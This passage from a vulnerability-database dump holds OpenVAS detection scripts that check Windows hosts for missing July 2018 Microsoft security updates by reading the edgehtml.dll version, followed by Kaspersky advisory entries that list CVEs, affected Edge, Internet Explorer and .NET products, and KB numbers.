script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4338829\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17913\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17913\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:13", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4338819", "modified": "2019-05-03T00:00:00", "published": "2018-07-11T00:00:00", "id": "OPENVAS:1361412562310813647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813647", "title": "Microsoft Windows Multiple Vulnerabilities (KB4338819)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4338819)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813647\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8282\", \"CVE-2018-8284\", \"CVE-2018-0949\", \"CVE-2018-8125\",\n \"CVE-2018-8202\", \"CVE-2018-8206\", \"CVE-2018-8222\", \"CVE-2018-8242\",\n \"CVE-2018-8260\", \"CVE-2018-8262\", \"CVE-2018-8274\", \"CVE-2018-8275\",\n \"CVE-2018-8276\", \"CVE-2018-8278\", \"CVE-2018-8279\", \"CVE-2018-8280\",\n \"CVE-2018-8286\", \"CVE-2018-8287\", \"CVE-2018-8288\", \"CVE-2018-8289\",\n \"CVE-2018-8290\", \"CVE-2018-8291\", \"CVE-2018-8294\", \"CVE-2018-8296\",\n \"CVE-2018-8297\", \"CVE-2018-8301\", \"CVE-2018-8307\", \"CVE-2018-8308\",\n \"CVE-2018-8309\", \"CVE-2018-8313\", \"CVE-2018-8324\", \"CVE-2018-8325\",\n \"CVE-2018-8356\", \"CVE-2016-7279\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-11 10:43:41 +0530 (Wed, 11 Jul 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4338819)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4338819\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to errors,\n\n - When Windows improperly handles File Transfer Protocol (FTP) connections.\n\n - When Windows improperly handles objects in memory.\n\n - When the Windows kernel fails to properly handle objects in memory.\n\n - When Microsoft WordPad improperly handles embedded OLE objects.\n\n - When Microsoft Edge improperly accesses objects in memory.\n\n - When scripting engine improperly handles objects in memory in Microsoft\n browsers.\n\n - When Chakra scripting engine improperly handles objects in memory in\n Microsoft Edge.\n\n - When the Windows kernel-mode driver fails to properly handle objects in\n memory.\n\n - Microsoft Chakra scripting engine allows Control Flow Guard (CFG) to be\n bypassed.\n\n - When Microsoft Internet Explorer improperly handles requests involving UNC\n resources.\n\n - When Microsoft Edge improperly handles specific HTML content.\n\n - When Windows Kernel API improperly enforces permissions.\n\n - When Microsoft .NET Framework components do not correctly validate\n certificates.\n\n - A security feature bypass vulnerability exists in Device Guard.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to cause a target system to stop responding, elevate their privilege level,\n run arbitrary code, bypass security, disclose sensitive information and also\n take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1803 for 32-bit Systems\n\n Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4338819\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.164\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.164\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:14", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4338825", "modified": "2019-05-03T00:00:00", "published": "2018-07-11T00:00:00", "id": "OPENVAS:1361412562310813651", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813651", "title": "Microsoft Windows Multiple Vulnerabilities (KB4338825)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4338825)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813651\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8282\", \"CVE-2018-8284\", \"CVE-2018-0949\", \"CVE-2018-8125\",\n \"CVE-2018-8202\", \"CVE-2018-8206\", \"CVE-2018-8222\", \"CVE-2018-8242\",\n \"CVE-2018-8260\", \"CVE-2018-8274\", \"CVE-2018-8275\", \"CVE-2018-8276\",\n \"CVE-2018-8279\", \"CVE-2018-8280\", \"CVE-2018-8286\", \"CVE-2018-8287\",\n \"CVE-2018-8288\", \"CVE-2018-8290\", \"CVE-2018-8291\", \"CVE-2018-8296\",\n \"CVE-2018-8297\", \"CVE-2018-8301\", \"CVE-2018-8304\", \"CVE-2018-8307\",\n \"CVE-2018-8308\", \"CVE-2018-8309\", \"CVE-2018-8313\", \"CVE-2018-8324\",\n \"CVE-2018-8356\", \"CVE-2016-7279\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-11 11:37:54 +0530 (Wed, 11 Jul 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4338825)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4338825\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to errors,\n\n - When Windows improperly handles File Transfer Protocol (FTP) connections.\n\n - When Windows improperly handles objects in memory.\n\n - When the Windows kernel fails to properly handle objects in memory.\n\n - When Microsoft WordPad improperly handles embedded OLE objects.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When scripting engine handles objects in memory in Microsoft browsers.\n\n - When Chakra scripting engine handles objects in memory in Microsoft Edge.\n\n - When the Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Microsoft Chakra scripting engine that allows Control Flow Guard (CFG)\n to be bypassed.\n\n - When Microsoft Internet Explorer improperly handles requests involving UNC\n resources.\n\n - When Windows Kernel API improperly enforces permissions.\n\n - A security feature bypass vulnerability exists in Device Guard.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to cause a target system to stop responding, elevate their privilege level,\n run arbitrary code, bypass security, disclose sensitive information and also\n take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1709 for 32-bit Systems\n\n Windows 10 Version 1709 for 64-based Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4338825\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.546\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.546\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:29:00", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4338826", "modified": "2020-01-07T00:00:00", "published": "2018-07-11T00:00:00", "id": "OPENVAS:1361412562310813650", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813650", "title": "Microsoft Windows Multiple Vulnerabilities (KB4338826)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4338826)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813650\");\n script_version(\"2020-01-07T08:11:35+0000\");\n script_cve_id(\"CVE-2018-8282\", \"CVE-2018-8284\", \"CVE-2018-0949\", \"CVE-2018-8125\",\n \"CVE-2018-8202\", \"CVE-2018-8206\", \"CVE-2018-8222\", \"CVE-2018-8242\",\n \"CVE-2018-8260\", \"CVE-2018-8274\", \"CVE-2018-8275\", \"CVE-2018-8276\",\n \"CVE-2018-8279\", \"CVE-2018-8280\", \"CVE-2018-8286\", \"CVE-2018-8287\",\n \"CVE-2018-8288\", \"CVE-2018-8290\", \"CVE-2018-8291\", \"CVE-2018-8296\",\n \"CVE-2018-8304\", \"CVE-2018-8307\", \"CVE-2018-8308\", \"CVE-2018-8309\",\n \"CVE-2018-8313\", \"CVE-2018-8324\", \"CVE-2018-8356\", \"CVE-2016-7279\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 08:11:35 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-07-11 11:24:45 +0530 (Wed, 11 Jul 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4338826)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4338826\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to errors,\n\n - When Windows improperly handles File Transfer Protocol (FTP) connections.\n\n - When Windows improperly handles objects in memory.\n\n - When the Windows kernel fails to properly handle objects in memory.\n\n - When Microsoft WordPad improperly handles embedded OLE objects.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When the scripting engine improperly handles objects in memory in\n Microsoft browsers.\n\n - When the Chakra scripting engine improperly handles objects in memory in\n Microsoft Edge.\n\n - When the Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Microsoft Chakra scripting engine that allows Control Flow Guard (CFG) to be\n bypassed.\n\n - When Microsoft Internet Explorer improperly handles requests involving UNC\n resources.\n\n - When the Windows Kernel API improperly enforces permissions.\n\n - A security feature bypass vulnerability exists in Device Guard.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to cause a target system to stop responding, elevate their privilege level,\n run arbitrary code, bypass security, disclose sensitive information and also\n take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4338826\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1205\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1205\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:19", "bulletinFamily": "info", "description": "### *Detect date*:\n07/10/2018\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple serious vulnerabilities were found in Microsoft Internet Explorer and Edge. Malicious users can exploit these vulnerabilities to bypass security restrictions, spoof user interface, execute arbitrary code and obtain sensitive information.\n\n### *Affected products*:\nInternet Explorer 10 \nInternet Explorer 11 \nInternet Explorer 9 \nMicrosoft Edge\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-0949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0949>) \n[CVE-2018-8278](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8278>) \n[CVE-2018-8242](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8242>) \n[CVE-2018-8286](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8286>) \n[CVE-2018-8279](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8279>) \n[CVE-2018-8324](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8324>) \n[CVE-2018-8294](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8294>) \n[CVE-2018-8296](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8296>) \n[CVE-2018-8297](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8297>) \n[CVE-2018-8262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8262>) \n[CVE-2018-8125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8125>) \n[CVE-2018-8276](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8276>) \n[CVE-2018-8280](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8280>) \n[CVE-2018-8290](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8290>) \n[CVE-2018-8274](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8274>) \n[CVE-2018-8325](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8325>) \n[CVE-2018-8301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8301>) \n[CVE-2018-8289](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8289>) \n[CVE-2018-8288](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8288>) \n[CVE-2018-8291](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8291>) \n[CVE-2018-8275](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8275>) \n[CVE-2018-8287](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8287>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2018-0949](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0949>)6.5Warning \n[CVE-2018-8278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8278>)6.1Warning \n[CVE-2018-8242](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8242>)7.5Warning \n[CVE-2018-8286](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8286>)7.5Warning \n[CVE-2018-8279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8279>)7.5Warning \n[CVE-2018-8324](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8324>)4.3Warning \n[CVE-2018-8294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8294>)7.5Warning \n[CVE-2018-8296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8296>)7.5Warning \n[CVE-2018-8297](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8297>)4.3Warning \n[CVE-2018-8262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8262>)7.5Warning \n[CVE-2018-8125](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8125>)7.5Warning \n[CVE-2018-8276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8276>)6.5Warning \n[CVE-2018-8280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8280>)7.5Warning \n[CVE-2018-8290](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8290>)7.5Warning \n[CVE-2018-8274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8274>)7.5Warning \n[CVE-2018-8325](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8325>)4.3Warning \n[CVE-2018-8301](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8301>)7.5Warning \n[CVE-2018-8289](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8289>)4.3Warning \n[CVE-2018-8288](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8288>)7.5Warning \n[CVE-2018-8291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8291>)7.5Warning \n[CVE-2018-8275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8275>)7.5Warning \n[CVE-2018-8287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8287>)7.5Warning\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4338830](<http://support.microsoft.com/kb/4338830>) \n[4338815](<http://support.microsoft.com/kb/4338815>) \n[4338825](<http://support.microsoft.com/kb/4338825>) \n[4338814](<http://support.microsoft.com/kb/4338814>) \n[4338818](<http://support.microsoft.com/kb/4338818>) \n[4338829](<http://support.microsoft.com/kb/4338829>) \n[4338819](<http://support.microsoft.com/kb/4338819>) \n[4338826](<http://support.microsoft.com/kb/4338826>) \n[4345421](<http://support.microsoft.com/kb/4345421>) \n[4345419](<http://support.microsoft.com/kb/4345419>) \n[4338816](<http://support.microsoft.com/kb/4338816>) \n[4345455](<http://support.microsoft.com/kb/4345455>) \n[4338831](<http://support.microsoft.com/kb/4338831>) \n[4345459](<http://support.microsoft.com/kb/4345459>) \n[4345420](<http://support.microsoft.com/kb/4345420>) \n[4345424](<http://support.microsoft.com/kb/4345424>) \n[4338821](<http://support.microsoft.com/kb/4338821>) \n[4345425](<http://support.microsoft.com/kb/4345425>) \n[4345418](<http://support.microsoft.com/kb/4345418>) \n[4339093](<http://support.microsoft.com/kb/4339093>)", "modified": "2019-03-07T00:00:00", "published": "2018-07-10T00:00:00", "id": "KLA11290", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11290", "title": "\r KLA11290Multiple vulnerabilities in Microsoft Edge and Internet Explorer ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-21T00:15:10", "bulletinFamily": "info", "description": "### *Detect date*:\n07/10/2018\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Development Tools. Malicious users can exploit these vulnerabilities to bypass security restrictions, execute arbitrary code, perform cross-site scripting attacks, gain privileges and spoof user interface.\n\n### *Affected products*:\n.NET Core 2.0 \nASP.NET Core 1.1 \nASP.NET Core 1.0 \nASP.NET Core 2.0 \nASP.NET Web Pages 3.2.3 \nASP.NET MVC 5.2 \nMicrosoft Visual Studio 2015 Update 3 \nMicrosoft Visual Studio 2017 \nMicrosoft Visual Studio 2013 Update 5 \nMicrosoft Visual Studio 2010 Service Pack 1 \nMicrosoft Visual Studio 2012 Update 5 \nMicrosoft Visual Studio 2017 Version 15.7.5 \nMicrosoft Visual Studio 2017 Version 15.8 Preview \nExpression Blend 4 Service Pack 3 \nMicrosoft .NET Framework 3.5.1 \nMicrosoft .NET Framework 3.5 \nMicrosoft .NET Framework 4.5.2 \nMicrosoft .NET Framework 4.6 \nMicrosoft .NET Framework 3.0 Service Pack 2 \nMicrosoft .NET Framework 2.0 Service Pack 2 \nMicrosoft .NET Framework 4.7.2 \nMicrosoft .NET Framework 4.6/4.6.1/4.6.2 \nMicrosoft .NET Framework 4.7/4.7.1/4.7.2 \n.NET Framework 4.7.2 Developer Pack \nChakraCore \nMicrosoft Wireless Display Adapter V2 Software Version 2.0.8365 \nMicrosoft Wireless Display Adapter V2 Software Version 2.0.8372 \nMicrosoft Wireless Display Adapter V2 Software Version 2.0.8350 \nMicrosoft Research JavaScript Cryptography Library \nWeb Customizations for Active Directory Federation Services \nPowerShell Extension for Visual Studio Code \nPowerShell Editor Services \n.NET Core 1.1 \n.NET Core 1.0\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8286](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8286>) \n[CVE-2018-8279](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8279>) \n[CVE-2018-8294](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8294>) \n[CVE-2018-8276](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8276>) \n[CVE-2018-8280](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8280>) \n[CVE-2018-8290](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8290>) \n[CVE-2018-8288](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8288>) \n[CVE-2018-8291](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8291>) \n[CVE-2018-8275](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8275>) \n[CVE-2018-8287](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8287>) \n[CVE-2018-8356](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8356>) \n[CVE-2018-8298](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8298>) \n[CVE-2018-8319](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8319>) \n[CVE-2018-8326](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8326>) \n[CVE-2018-8306](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8306>) \n[CVE-2018-8202](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8202>) \n[CVE-2018-8172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8172>) \n[CVE-2018-8260](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8260>) \n[CVE-2018-8327](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8327>) \n[CVE-2018-8171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8171>) \n[CVE-2018-8232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8232>) \n[CVE-2018-8284](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8284>) \n[CVE-2018-8283](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8283>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft .NET Framework](<https://threats.kaspersky.com/en/product/Microsoft-.NET-Framework/>)\n\n### *CVE-IDS*:\n[CVE-2018-8286](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8286>)7.5Warning \n[CVE-2018-8279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8279>)7.5Warning 